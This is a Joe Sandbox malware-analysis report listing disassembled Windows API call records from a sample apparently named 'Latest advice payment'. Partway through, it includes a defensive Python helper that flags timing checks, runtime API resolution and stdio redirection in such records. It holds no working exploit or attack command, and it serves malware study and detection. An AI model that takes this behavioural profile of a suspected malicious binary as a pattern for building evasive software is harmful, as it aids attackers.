                                                              • Part of subcall function 00561D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00561D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005E6461
                                                            • LoadLibraryW.KERNEL32(?), ref: 005E6468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005E647D
                                                            • DestroyWindow.USER32(?), ref: 005E6485
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: ea6f5fab7ec2b6127588f652861753b9ebe603723ac83140d6adf686a7fb6d94
                                                            • Instruction ID: 846659f857c32e8e1a5608376f2132396a6a12013e27c297005217889cbfec42
                                                            • Opcode Fuzzy Hash: ea6f5fab7ec2b6127588f652861753b9ebe603723ac83140d6adf686a7fb6d94
                                                            • Instruction Fuzzy Hash: B8218E71100286ABEF144F65DC84EBB3BA9FB693E4F104629F990970D0D7319C41A760
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 005C6DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C6DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 005C6E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005C6E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 204699f00e172ead08d33622ad7caec6d68b1f7f6f62809db31a877246ee24b9
                                                            • Instruction ID: 6eb6dea157c3129f00058bd347ce138f1712e8e0605466cc9b9a0bd06b3690fa
                                                            • Opcode Fuzzy Hash: 204699f00e172ead08d33622ad7caec6d68b1f7f6f62809db31a877246ee24b9
                                                            • Instruction Fuzzy Hash: 3221917560020AAFDB209FA9DC44F9A7BA8FF94720F204A1DF9A1D72D0DB709A549B50
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 005C6E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C6EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 005C6ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005C6F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: a3212256001b7360fa28572da965054f162dd55ee3bf79a9bdd14061c908f6f0
                                                            • Instruction ID: f81c3fa13c7b9f1d1ccf88533a1856b52ccca2a9346cac170da7ca0844f2eefb
                                                            • Opcode Fuzzy Hash: a3212256001b7360fa28572da965054f162dd55ee3bf79a9bdd14061c908f6f0
                                                            • Instruction Fuzzy Hash: 13218E795003069FDB209FA9DC44FAB7BA8BF55720F200A1EF9A0D72D0DB70AA51CB50
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CAC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 005CACA8
                                                            • __swprintf.LIBCMT ref: 005CACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,005EF910), ref: 005CACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 4a865db5db664eb7c16df59b5e17c144751b2a1d1dc9b7b1038a567fc7a3902c
                                                            • Instruction ID: 05c0bd38b61122ab20848970f6394cc2e45bc9fbeaefbace15e2dc86c38ee51d
                                                            • Opcode Fuzzy Hash: 4a865db5db664eb7c16df59b5e17c144751b2a1d1dc9b7b1038a567fc7a3902c
                                                            • Instruction Fuzzy Hash: 11216234A0014EAFCB14DF95C985DEE7BB8FF89714B004469F9099B251DA31EA45DB21
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C1184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C11C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID: @\
                                                            • API String ID: 2875609808-1487419200
                                                            • Opcode ID: d84dd5abf0f05ca8711f84ccba3bb86b00e6baa94fb145167535890852e509cb
                                                            • Instruction ID: 06a11728600b9ebde2556ceca01a54709551f83a7eb1fe3092a0ed363dca5ae4
                                                            • Opcode Fuzzy Hash: d84dd5abf0f05ca8711f84ccba3bb86b00e6baa94fb145167535890852e509cb
                                                            • Instruction Fuzzy Hash: 12113631C0091DDBCF049FE4D898BEEBF78BB1A711F044459EA80B6281CB349554DBA9
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 005C1B19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: ce3770242c029bce1bf8c7630fbab05ea3a0787a97f6ce7ba52467a66e6ecc16
                                                            • Instruction ID: 15821263deede8c920e799aad708f49c90a9ba8effa72533e5ac292f596d3353
                                                            • Opcode Fuzzy Hash: ce3770242c029bce1bf8c7630fbab05ea3a0787a97f6ce7ba52467a66e6ecc16
                                                            • Instruction Fuzzy Hash: C61161359002098FCF48EFA4D8569FEBBB5FF66308B144469D89467292EB325D0ACF54
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005DEC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 005DEC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 005DED6A
                                                            • CloseHandle.KERNEL32(?), ref: 005DEDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: 6a1ee2cc0466dd05b2994ef78787dccc926b76353c99083a0cedeac125f6ad97
                                                            • Instruction ID: 0e8544be8dd960f822848be303bde2a4920c4c0bb272695b274bd3970dc30827
                                                            • Opcode Fuzzy Hash: 6a1ee2cc0466dd05b2994ef78787dccc926b76353c99083a0cedeac125f6ad97
                                                            • Instruction Fuzzy Hash: F78154716047019FD760EF28C88AF2ABBE5BF94710F14891EF9959B3D2DA71AC40CB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: cba6f4c99b181c3e5496132084cab7fc1bcaa6e5f968818f7570099dea8fadb3
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: C251B570A01B05DBDF25AFA9D88466E7FA6BF40321F248729FC25B62D0F7709D908B41
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E00FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005E0183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 005E01AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E01BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 434f679458818909dfb44b5824d9238d453c1b79c3be1908d4cab15a1016ebef
                                                            • Instruction ID: 138ba35534f0786052352ce1a2d18e9a2c05a31b53a6437a2fbe63f4a0ba66c1
                                                            • Opcode Fuzzy Hash: 434f679458818909dfb44b5824d9238d453c1b79c3be1908d4cab15a1016ebef
                                                            • Instruction Fuzzy Hash: 13517B71208345AFC718EF58CC85E6ABBE9FF84314F40492DF5968B2A2DB71E944CB52
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005DD927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 005DD9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 005DD9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 005DDA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005DDA21
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005C7896,?,?,00000000), ref: 00565A2C
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005C7896,?,?,00000000,?,?), ref: 00565A50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 58e4d7917f22ce03e198b17d3b2bdeb582b4bed08232a2cbb83e44ff01a55db1
                                                            • Instruction ID: 05136fc36c13b6a8172dfba52ab31143e9e0486249a042ad89701af86535dd08
                                                            • Opcode Fuzzy Hash: 58e4d7917f22ce03e198b17d3b2bdeb582b4bed08232a2cbb83e44ff01a55db1
                                                            • Instruction Fuzzy Hash: 53512935A0420ADFCB14EFA8C4989ADBBF4FF59310B04C06AE855AB322DB31AD45CF51
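The records above are quicker to triage in bulk than by eye: the QueryPerformanceCounter/Sleep pair at 005C115F, the two GetStdHandle/CreatePipe/CreateFileW(nul) functions at 005C6DBC and 005C6E89 (same API String ID, so the same API set and strings), and the LoadLibraryW/GetProcAddress/FreeLibrary function at 005DD927. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses records in the layout the IDA plugin prints, flags a few API patterns, and groups records that share an API String ID. The sample text is abridged from records on this page and embedded so the script runs offline; the pattern names and rules are this example's own assumptions, not Joe Sandbox signature names. A hit is a triage lead, not a verdict: interpreter runtime code produces the same API sets as hand-written anti-analysis code, so a flagged function still needs its callers checked.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example,
not Joe Sandbox code): parses the printed 'APIs' bullets and 'Similarity'
fields, flags a few API patterns, groups functions sharing an API String ID."""
import re
from collections import defaultdict

# Constructed sample: four records abridged from this report (indentation, dump
# source lines and 'Similarity' headings dropped; the parser ignores all three).
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C1184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C11C1
• API ID: CounterPerformanceQuerySleep
• API String ID: 2875609808-1487419200
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 005C6DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C6DEF
• GetStdHandle.KERNEL32(0000000C), ref: 005C6E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005C6E3B
• API ID: CreateHandle$FilePipe
• API String ID: 4209266947-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 005C6E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C6EBB
• GetStdHandle.KERNEL32(000000F6), ref: 005C6ECC
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005C6F06
• API ID: CreateHandle$FilePipe
• API String ID: 4209266947-2873401336
APIs
  • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005DD927
• GetProcAddress.KERNEL32(00000000,?), ref: 005DD9AA
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005DDA21
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• API String ID: 327935632-0
"""

# One call as printed: [Part of subcall function X: ]Name.MODULE[(args)][,] ref: ADDR
CALL_RE = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-F]+: )?(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^(?P<key>API ID|String ID|API String ID): ?(?P<val>.*)$")

def parse_records(text):
    """One dict per function: its calls in printed order plus Similarity fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":                     # every record starts at an APIs heading
            cur = {"calls": [], "fields": {}}
            records.append(cur)
        elif cur is not None and (m := CALL_RE.match(line)):
            args = m.group("args")
            cur["calls"].append({
                "api": m.group("api"), "module": m.group("mod"),
                "args": args.split(",") if args is not None else [],
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub") is not None,   # callee's call, not this function's
            })
        elif cur is not None and (f := FIELD_RE.match(line)):
            cur["fields"][f.group("key")] = f.group("val")
    return records

def flag_record(rec):
    """Assumed triage rules over the function's own (non-subcall) calls."""
    apis = [c["api"] for c in rec["calls"] if not c["subcall"]]
    hits = []
    if apis.count("QueryPerformanceCounter") >= 2 and "Sleep" in apis:
        hits.append("timing-measurement")        # high-resolution timer bracketing Sleep
    if "LoadLibraryW" in apis and "GetProcAddress" in apis:
        hits.append("dynamic-api-resolution")    # imports resolved at run time
    if "CreatePipe" in apis and any(
            c["api"] == "CreateFileW" and c["args"][:1] == ["nul"] for c in rec["calls"]):
        hits.append("stdio-redirect-nul")        # child stdio wired to a pipe or NUL
    return hits

def duplicate_groups(records):
    """Indexes of records sharing an API String ID (same API set and strings)."""
    groups = defaultdict(list)
    for i, r in enumerate(records):
        key = r["fields"].get("API String ID")
        if key:
            groups[key].append(i)
    return {k: v for k, v in groups.items() if len(v) > 1}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, r in enumerate(recs):
        own = [c["ref"] for c in r["calls"] if not c["subcall"]]
        print(f"[{i}] {min(own):08X} {r['fields'].get('API ID', ''):40} {', '.join(flag_record(r)) or '-'}")
    for key, idx in duplicate_groups(recs).items():
        print(f"shared API String ID {key}: records {idx}")
```

Run as a script it prints one line per record (lowest own ref, API ID, pattern hits) and then the records that share an API String ID. `parse_records` takes the raw report text, so this whole section of the page can be fed in unchanged; the Memory Dump Source, Snapshot File and hash lines simply fail both regexes and are skipped.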
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005CE61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005CE648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 005CE687
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 005CE6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005CE6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a7534fbde9917183cd195eef06eec623b005868adcea274ee09883d383c74a95
                                                            • Instruction ID: c4a40085b86cbde251dd75e4893fb6fa2b5616529acff063f45c4d4bd56a391a
                                                            • Opcode Fuzzy Hash: a7534fbde9917183cd195eef06eec623b005868adcea274ee09883d383c74a95
                                                            • Instruction Fuzzy Hash: C6512A35A00106DFCB05EFA4C985AAEBBF9FF49314B1480A9E849AB361CB31ED55DF50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetCursorPos.USER32(?), ref: 00562357
• ScreenToClient.USER32(006257B0,?), ref: 00562374
• GetAsyncKeyState.USER32(00000001), ref: 00562399
• GetAsyncKeyState.USER32(00000002), ref: 005623A7
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B63E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 005B6433
• TranslateMessage.USER32(?), ref: 005B645C
• DispatchMessageW.USER32(?), ref: 005B6466
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B6475
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
APIs
• GetWindowRect.USER32(?,?), ref: 005B8A30
• PostMessageW.USER32(?,00000201,00000001), ref: 005B8ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 005B8AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 005B8AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005B8AF8
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 005BB204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005BB221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005BB259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005BB27F
• _wcsstr.LIBCMT ref: 005BB289
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
• GetWindowLongW.USER32(?,000000F0), ref: 005EB192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 005EB1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 005EB1CF
• GetSystemMetrics.USER32(00000004), ref: 005EB1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,005D0E90,00000000), ref: 005EB216
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005B9320
  • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005B9352
• __itow.LIBCMT ref: 005B936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005B9392
• __itow.LIBCMT ref: 005B93A3
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
APIs
• IsWindow.USER32(00000000), ref: 005D5A6E
• GetForegroundWindow.USER32 ref: 005D5A85
• GetDC.USER32(00000000), ref: 005D5AC1
